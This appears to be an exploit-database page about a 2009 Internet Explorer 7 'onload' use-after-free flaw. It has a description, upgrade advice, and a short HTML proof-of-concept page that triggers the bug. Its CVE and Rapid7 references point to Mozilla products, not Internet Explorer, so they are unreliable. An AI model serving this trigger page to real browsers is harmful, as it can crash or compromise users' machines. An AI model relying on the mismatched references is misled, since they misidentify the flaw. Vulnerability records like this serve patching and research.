header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Kingcope
9.3
CVSS
HIGH
Microsoft Internet Explorer 7.0.5730.13 "onload" Event Handler Remote Code Execution
94
CWE
Product Name: Internet Explorer
Affected Version From: 7.0.5730.13
Affected Version To: 7.0.5730.13
Patch Exists: YES
Related CWE: CVE-2009-0652
CPE: o:microsoft:internet_explorer:7.0.5730.13
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-0437/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-0436/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2009-0652/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-0652/https://www.rapid7.com/db/vulnerabilities/mfsa2009-15-cve-2009-0652/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0652/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2009-0652/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-0652/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=63402https://www.infosecmatter.com/nessus-plugin-library/?id=42076https://www.infosecmatter.com/nessus-plugin-library/?id=42075https://www.infosecmatter.com/nessus-plugin-library/?id=41350https://www.infosecmatter.com/nessus-plugin-library/?id=44768https://www.infosecmatter.com/nessus-plugin-library/?id=47171https://www.infosecmatter.com/nessus-plugin-library/?id=70959https://www.infosecmatter.com/nessus-plugin-library/?id=39880https://www.infosecmatter.com/nessus-plugin-library/?id=47173https://www.infosecmatter.com/nessus-plugin-library/?id=60843
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Microsoft Internet Explorer 7.0.5730.13 “onload” Event Handler Remote Code Execution

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the "onload" event handler. By crafting a malicious page, an attacker can cause a pointer to be reused after it has been freed. This can lead to arbitrary code execution under the context of the user.

Mitigation:

Upgrade to Internet Explorer 8.0 or later.
Source

Exploit-DB raw data:

<BODY onload="
document.designMode='on';//string
document.removeChild(document.firstChild);//object
document.queryCommandState('BackColor');
">

# milw0rm.com [2009-02-23]

Navigation

Suggest Exploit

Services By CQR